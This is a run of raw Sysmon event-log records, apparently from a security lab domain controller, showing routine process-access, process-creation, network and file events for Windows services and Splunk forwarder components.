07:54:50.905{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049789Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:50.905{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049788Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:50.905{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F54A-60EB-4E7D-00000000CF01}9408C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001049787Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:50.905{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F54A-60EB-4E7D-00000000CF01}9408C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001049786Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:50.906{466BC892-F54A-60EB-4E7D-00000000CF01}9408C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000001049785Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:42.761{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51063-false10.0.1.12-8000- 10341000x80000000000000001049784Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:50.523{466BC892-F54A-60EB-4D7D-00000000CF01}88849860C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001049783Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:50.258{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DBC82F77552F7538C160A8C1A6A66633,SHA256=1BC4DA5858E804058FD05BF7879DDD3A48D53AC9FEB58160CA9133CFFE257715,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049782Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:50.242{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F54A-60EB-4D7D-00000000CF01}8884C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049781Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:50.242{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049780Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:50.242{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049779Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:50.242{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049778Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:50.242{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049777Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:50.242{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F54A-60EB-4D7D-00000000CF01}8884C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001049776Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:50.242{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F54A-60EB-4D7D-00000000CF01}8884C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001049775Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:50.221{466BC892-F54A-60EB-4D7D-00000000CF01}8884C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001049774Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:50.025{466BC892-32D3-60E8-700B-00000000CF01}166410132C:\Windows\System32\sihost.exe{466BC892-F524-60EB-4C7D-00000000CF01}7300C:\Windows\system32\backgroundTaskHost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\twinui.appcore.dll+684b|C:\Windows\System32\twinui.appcore.dll+756d|C:\Windows\system32\activationmanager.dll+b93d|C:\Windows\System32\twinui.appcore.dll+3df1|C:\Windows\SYSTEM32\twinapi.appcore.dll+2accd|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049773Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:50.025{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-F524-60EB-4C7D-00000000CF01}7300C:\Windows\system32\backgroundTaskHost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|c:\windows\system32\bisrv.dll+1d9ff|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000001049772Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:50.005{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F524-60EB-4C7D-00000000CF01}7300C:\Windows\system32\backgroundTaskHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a384|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049771Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:50.005{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F524-60EB-4C7D-00000000CF01}7300C:\Windows\system32\backgroundTaskHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049770Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:50.005{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049769Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:50.005{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049768Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:50.005{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049767Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:50.005{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049766Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:50.005{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-F524-60EB-4C7D-00000000CF01}7300C:\Windows\system32\backgroundTaskHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RP
CRT4.dll+1ae1c 10341000x80000000000000001049765Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:50.005{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-F524-60EB-4C7D-00000000CF01}7300C:\Windows\system32\backgroundTaskHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049764Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:50.005{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049763Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
